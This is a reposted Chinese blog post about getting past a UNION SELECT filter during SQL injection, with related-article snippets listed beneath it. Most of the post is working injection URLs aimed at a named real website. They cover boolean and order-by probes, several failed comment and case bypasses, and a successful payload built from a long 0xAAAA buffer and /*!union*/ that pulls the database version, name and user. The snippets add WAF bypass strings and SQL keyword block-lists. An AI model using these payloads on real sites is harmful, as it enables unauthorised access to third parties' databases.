【转】突破sql 注入过滤Union+SELECT 继续射下去

最新推荐文章于 2022-09-11 19:49:34 发布
最新推荐文章于 2022-09-11 19:49:34 发布
阅读量750 收藏
点赞数 1
分类专栏: Private 文章标签: sql database bt 数据库 工具 user

前几今天遇到一个bt 的老外注射点:  

//*ps 此点目前流行的注射工具射不 *//  
http://cleopatra-sy.com/index.php?content=more_product&id=17  
  
http://cleopatra-sy.com/index.php?content=more_product&id=17 and 1=1  正常  
http://cleopatra-sy.com/index.php?content=more_product&id=17 and 1=2  报错  

http://cleopatra-sy.com/index.php?content=more_product&id=17 order by 6  正常  
http://cleopatra-sy.com/index.php?content=more_product&id=17 order by 7  错误  
                                                                                               
继续按照常规的手法注射:  
http://cleopatra-sy.com/index.php?content=more_product&id=-17+UNION+SELECT+1,2
3,4,5,6--

错误nnd,过滤 UNION+SELECT  我们来加点特殊的字符看看能不能绕过  
http://cleopatra-sy.com/index.php?content=more_product&id=-17+/**//**//*!uNiOn*//**/
/**//*!sElEcT*//**//**/1,2,3,4,5,6--  
  
                                                                                                          
悲剧还是绕不过去  - -,于是尝试自己知道的绕过方法继续射…  
http://cleopatra-sy.com/index.php?content=more_product&id=-17+/*U*//*n*//*i*//*o*//*n
*//*t*/+/*s*//*e*//*l*//*e*//*c*//*t*/+1,2,3,4,5,6--  
                                                                                               

http://cleopatra-sy.com/index.php?content=more_product&id=-17+concat(u,n,i,o,n)+conca
t(s,e,l,e,c,t)+all+1,2,3,4,5,6--  

悲剧还是绕不过去,nnd。找了几个朋友看了还是绕不过去邪恶的过滤啊。要是国内 
的站以上几种方法一般都能搞定,老外就是bt。最后实在木有办法了只好去国外的黑 
客论坛求助老外帮助。国外php 注射历史悠久手法独特+方法猥琐  射出几率相当高  
于是发帖求助了终于有一个黑客回帖了而且轻松的绕过去了。  
http://cleopatra-sy.com/index.php?content=more_product&id=-17   and   (select   1)=(select  
0xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAA)+/*!union*/+select+1,2,3,4,5,6--+-  

靠,老外果然牛B 那么继续射  
http://cleopatra-sy.com/index.php?content=more_product&id=-17   and   (select   1)=(select  
0xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAA)+/*!union*/+select+1,concat_ws(0x7c,version(),database(),u 
ser()),3,4,5,6--+-  
成功得到系统版本、当前数据库用户、用户名  

xHydra
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQL靶场练习之二(空格绕过、报错注入
Lorezon的博客
01-16 714
空格绕过 初始页面是这样的: 0x00判断是否存在注入 在name后面加个单引号,发现页面返回异常: 判断存在注入。 0x02常规拼接 name’ and 1=1 返回异常,显示ERROR NO SPACE,错误无空格。想办法把空格取代掉,使用/**/拼接语句name’/**/and/**/1=1%23 页面返回正常,说明绕过成功。 0x03判断字段 name’/**/order/**/by/*...
SQL Injection绕过技巧
weixin_34261739的博客
08-15 1113
0x00 sql注入的原因 sql注入的原因,表面上说是因为 拼接字符串,构成sql语句,没有使用 sql语句预编译,绑定变量。 但是更深层次的原因是,将用户输入的字符串,当成了 “sql语句” 来执行。 比如上面的 String sql = "select id,no from user where id=" + id; 我们希望用户输入的 id 的值,仅仅作为一个字符串字面值,传入数据库执行,...
迈普交换机配置
02-06
迈普交换机配置aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
sql注入绕过union select过滤
烟敛寒林的博客
11-09 6140
# # # #WAF Bypassing Strings: /*!%55NiOn*/ /*!%53eLEct*/ %55nion(%53elect 1,2,3)-- - +union+distinct+select+ +union+distinctROW+select+ /**//*!12345UNION SELECT*//**/ /**//*!50000UN...
sql注入select/union select
@一只躺平的猪@的博客
07-14 2866
selectselect 1 from table、 select count(1) from table、select sum(1) from table union selectunion语句使用条件、判断字段数 union select 1,2(或union select null,null)、 判断回显位置
输入值/表单提交参数过滤有效防止sql注入的方法
01-21
输入值/表单提交参数过滤,防止sql注入或非法攻击的方法: 复制代码 代码如下: /** * 过滤sql与php文件操作的关键字 * @param string $string * @return string * @author zyb <zyb> */ private function filter_...
JS代码防止SQL注入的方法(超简单)
01-19
下面通过两个方面给大家介绍js代码防止sql注入的方法,非常简单实用,感兴趣的朋友参考下吧! 1.URL地址防注入: //过滤URL非法SQL字符 var sUrl=location.search.toLowerCase(); var sQuery=sUrl.substring(sUrl....
php防止sql注入代码实例
12-18
放到公用调用文件(如conn数据库链接文件),对所有GET或POST的数据进行过滤特殊字符串,以实现简单有效的SQL注入过滤 复制代码 代码如下:Function inject_check($sql_str) { return eregi(‘select|insert|and|or|...
详解SQL注入–安全(二)
01-19
写在前面:在前两天初学SQL注入的基础上,继续在Metasploitable-Linux环境下进行练习。 一、前面学习的SQL注入,那么当然就有防注入。由于web注入危害较大,各种防御技术也层出不穷。 1、程序猿在写代码时会有意识的...
分享两段简单的JS代码防止SQL注入
11-23
//过滤URL非法SQL字符 var sUrl=location.search.toLowerCase(); var sQuery=sUrl.substring(sUrl.indexOf("=")+1); re=/select|update|delete|truncate|join|union|exec|insert|drop|count|'|"|;|>|<|%/i; if(re...
select绕过
devil8123665的博客
11-22 1387
#WAFBypassingStrings: /*!%55NiOn*//*!%53eLEct*/ %55nion(%53elect1,2,3)--- +union+distinct+select+ +union+distinctROW+select+ /**//*!12345UNIONSELECT*//**/ /**//*!50000UNIONSELECT*//**/ /**/UNION/**//*!50000SELECT*//**/ /*!5000...
突破sql 注入过滤Union+SELECT 继续下去
天元喜羊羊的博客
08-04 1万+
http://www.myhack58.com/Article/html/3/7/2011/31053.htm  前几今天遇到一个bt 的老外注点:   //*ps 此点目前流行的注工具不 *//   http://cleopatra-sy.com/index.php?content=more_product&id=17      http://cleopatr
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
kokodayo__的博客
09-11 281
int main(){}
简单的sql注入之2 / writeup (手工注入,纯属练手)
wewww111的博客
08-10 1933
多测试几次可以发现,空格被注释了,百度解决方法,用/**/代替空格的位置, 构造语句1'/**/or/**/'1'='1 确认为单引号注入 用order by 确认select字段数,以确定union的字段数 可得,只有一个字段 获取数据库  1'/**/union/**/select/**/schema_name/**/from/**/information_schema....
变态方法突破过滤UNION+SELECT继续注入
热门推荐
ncafei的博客
11-27 1万+
http://www.jb51.net/article/48933.htm   前几今天遇到一个bt 的老外注点:     //*ps 此点目前流行的注工具不 *//     http:// /index.php?content=more_product&id=17     http:// /index.php?content=more_product&i
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
ssaghh1的博客
03-01 2301
这里写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Ma...
sql注入过滤select
最新发布
07-28
SQL注入中,过滤select关键字是常见的安全措施之一。然而,有一些方法可以绕过这种过滤。一种方法是在过滤过滤的关键词前面加上URL编码的空字节%00。这是因为在C/C++中,空字节代表语句的结束,而SQL语句对空...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值